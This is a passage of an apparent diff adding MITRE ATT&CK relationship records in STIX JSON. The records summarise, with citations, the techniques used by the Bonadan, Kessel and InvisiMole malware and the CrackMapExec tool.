of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Bonadan](https://attack.mitre.org/software/S0486) can download an additional module which has a cryptocurrency mining extension.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--6c0d9758-34f0-49b4-ad12-91329b4398e2", + "type": "relationship", + "modified": "2020-07-16T15:10:35.333Z", + "created": "2020-07-16T15:10:35.333Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "target_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Bonadan](https://attack.mitre.org/software/S0486) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--bc40c6be-575a-4eb9-981f-fa6c127d2286", + "type": "relationship", + "modified": "2020-07-16T15:10:35.343Z", + "created": "2020-07-16T15:10:35.343Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Bonadan](https://attack.mitre.org/software/S0486) has discovered the OS version, CPU model, and RAM size of the system it has been installed on.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--34775b6e-f7dd-4b0f-bbb4-c696bfbda1c2", + "type": "relationship", + "modified": "2020-07-16T15:10:35.345Z", + "created": "2020-07-16T15:10:35.345Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--4c6d62c2-89f5-4159-8fab-0190b1f9d328", + "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Bonadan](https://attack.mitre.org/software/S0486) has discovered the username of the user running the backdoor.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--db5506f9-9451-471f-bb68-845c281be09c", + "type": "relationship", + "modified": "2020-07-16T15:10:35.348Z", + "created": "2020-07-16T15:10:35.348Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--45852cf6-f0e8-45b8-9636-0dee90f7d2fc", + "type": "relationship", + "modified": "2020-07-16T15:23:48.405Z", + "created": "2020-07-16T15:23:48.405Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) can use a proxy during exfiltration if set in the configuration.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--75aa57b2-5d2e-49ec-9c26-317b361632c3", + "type": "relationship", + "modified": "2020-07-16T15:23:48.442Z", + "created": "2020-07-16T15:23:48.442Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--c291bd7d-bf11-4be0-8d31-77055bb7675a", + "type": "relationship", + "modified": "2020-07-23T16:50:06.786Z", + "created": "2020-07-16T15:23:48.446Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--25f5e7b1-4f7f-48e1-b647-16a4ac018357", + "type": "relationship", + "modified": "2020-07-16T15:23:48.576Z", + "created": "2020-07-16T15:23:48.576Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) has exfiltrated information gathered from the infected system to the C2 server.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--acd25956-0e08-4643-a121-33f20eb4b24c", + "type": "relationship", + "modified": "2020-07-16T15:23:48.581Z", + "created": "2020-07-16T15:23:48.581Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) has collected the DNS address of the infected host.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--5812d086-babd-4b26-8d69-62cebcfc5fc4", + "type": "relationship", + "modified": "2020-07-16T15:23:48.583Z", + "created": "2020-07-16T15:23:48.583Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) has collected the system architecture, OS version, and MAC address information.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--6e9c79b0-9b63-4785-be48-033ab5f55a18", + "type": "relationship", + "modified": "2020-07-16T15:23:48.585Z", + "created": "2020-07-16T15:23:48.585Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) has decrypted the binary's configuration once the main function was launched.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--54e76e33-91b4-409f-a784-7e181f82b216", + "type": "relationship", + "modified": "2020-07-16T15:23:48.600Z", + "created": "2020-07-16T15:23:48.600Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487)'s configuration is hardcoded and RC4 encrypted within the binary.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--02eba953-12a6-434a-bc67-2337864cf560", + "type": "relationship", + "modified": "2020-07-16T15:23:48.759Z", + "created": "2020-07-16T15:23:48.759Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--c984b414-b766-44c5-814a-2fe96c913c12", + "target_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "external_references": [ + { + "source_name": "ESET ForSSHe December 2018", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf", + "description": "Dumont, R., M.L\u00e9veill\u00e9, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020." + } + ], + "description": "[Kessel](https://attack.mitre.org/software/S0487) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)", + "relationship_type": "uses", + "id": "relationship--68e017e5-ee14-4e33-9907-2537fbbdb117", + "type": "relationship", + "modified": "2020-07-16T15:23:48.762Z", + "created": "2020-07-16T15:23:48.762Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can capture keystrokes on a compromised host.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--50001cfb-68b5-423c-9c18-6c26f6daad3f", + "type": "relationship", + "modified": "2020-07-16T15:24:32.826Z", + "created": "2020-07-16T15:24:32.826Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--90eb6858-e561-4ed0-855b-f9afbe3ac394", + "type": "relationship", + "modified": "2020-07-17T20:14:44.600Z", + "created": "2020-07-16T15:24:32.836Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can scan the network for open ports and vulnerable instances of RDP and SMB protocols.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--ddede021-d8bc-4303-9915-5b2dd0ebd4cd", + "type": "relationship", + "modified": "2020-07-16T15:51:26.033Z", + "created": "2020-07-16T15:24:32.838Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can replace legitimate software or documents in the compromised network with their trojanized versions, in an attempt to propagate itself within the network.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--cd99a29c-0364-4d56-97ff-97542ff76fde", + "type": "relationship", + "modified": "2020-08-17T14:49:07.976Z", + "created": "2020-07-16T15:51:25.693Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can spread within a network via the BlueKeep (CVE-2019-0708) and EternalBlue (CVE-2017-0144) vulnerabilities in RDP and SMB respectively.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--a14c0cae-f7da-42d6-ab3c-f11746233e06", + "type": "relationship", + "modified": "2020-10-21T17:38:02.363Z", + "created": "2020-07-16T15:51:25.742Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce", + "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "external_references": [ + { + "source_name": "ESET InvisiMole June 2020", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020." + } + ], + "description": "[InvisiMole](https://attack.mitre.org/software/S0260) can check for artifacts of VirtualBox, Virtual PC and VMware environment, and terminate itself if they are detected.(Citation: ESET InvisiMole June 2020)", + "relationship_type": "uses", + "id": "relationship--13aed490-7d1f-4839-90c9-32d587d58afd", + "type": "relationship", + "modified": "2020-08-17T15:22:30.289Z", + "created": "2020-07-16T15:51:25.749Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can collect DNS information from the targeted system.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--de55c190-81ee-49b8-a279-1692725ea6cc", + "type": "relationship", + "modified": "2020-07-29T20:01:02.423Z", + "created": "2020-07-17T15:48:51.479Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can create a registry key using wdigest.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--99eab281-6555-4aee-9d83-0e97bb3262ef", + "type": "relationship", + "modified": "2020-07-29T20:01:02.427Z", + "created": "2020-07-17T15:48:51.491Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--e624264c-033a-424d-9fd7-fc9c3bbdb03e", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can pass the hash to authenticate via SMB.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--be8c0014-e10e-4854-8a5b-8a06e35a8623", + "type": "relationship", + "modified": "2020-07-29T20:01:02.445Z", + "created": "2020-07-17T15:48:51.512Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can execute PowerShell commands via WMI.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--d8ead39e-aa9f-44a7-ac5d-1a9b3bb46431", + "type": "relationship", + "modified": "2020-07-29T20:01:02.476Z", + "created": "2020-07-17T15:48:51.544Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the system drives and associated system name.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--c42d1cc1-3685-4bd7-96ba-84a66cc6a287", + "type": "relationship", + "modified": "2020-07-29T20:01:02.483Z", + "created": "2020-07-17T15:48:51.546Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can gather the user accounts within domain groups.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--cdcc30ba-b4be-469f-ae09-18913c53205d", + "type": "relationship", + "modified": "2020-07-29T20:01:03.034Z", + "created": "2020-07-17T15:48:51.550Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can execute remote commands using Windows Management Instrumentation.(Citation: CME Github September 2018)\t", + "relationship_type": "uses", + "id": "relationship--85ee8dfa-7f36-406a-a87c-97633530bdda", + "type": "relationship", + "modified": "2020-07-29T20:01:03.042Z", + "created": "2020-07-17T15:48:51.552Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--10ecbc19-10ab-4564-a637-cc4f6773e533", + "type": "relationship", + "modified": "2020-07-29T20:01:03.038Z", + "created": "2020-07-17T15:48:51.555Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--09c4c11e-4fa1-4f8c-8dad-3cf8e69ad119", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force passwords for a specified user on a single target system or across an entire network.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--5348c284-b5c7-4b30-a528-a9b0002ac8b9", + "type": "relationship", + "modified": "2020-07-29T20:01:03.107Z", + "created": "2020-07-17T15:48:51.559Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "tool--c4810609-7da6-48ec-8057-1b70a7814db0", + "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "external_references": [ + { + "source_name": "CME Github September 2018", + "url": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference", + "description": "byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020." + } + ], + "description": "[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the shared folders and associated permissions for a targeted network.(Citation: CME Github September 2018)", + "relationship_type": "uses", + "id": "relationship--61d859c1-c6f4-4f5f-bc5f-032481dddbe4", + "type": "relationship", + "modified": "2020-07-29T20:01:03.100Z", + "created": "2020-07-17T15:48:51.563Z" + }, + { + "created_by_ref": 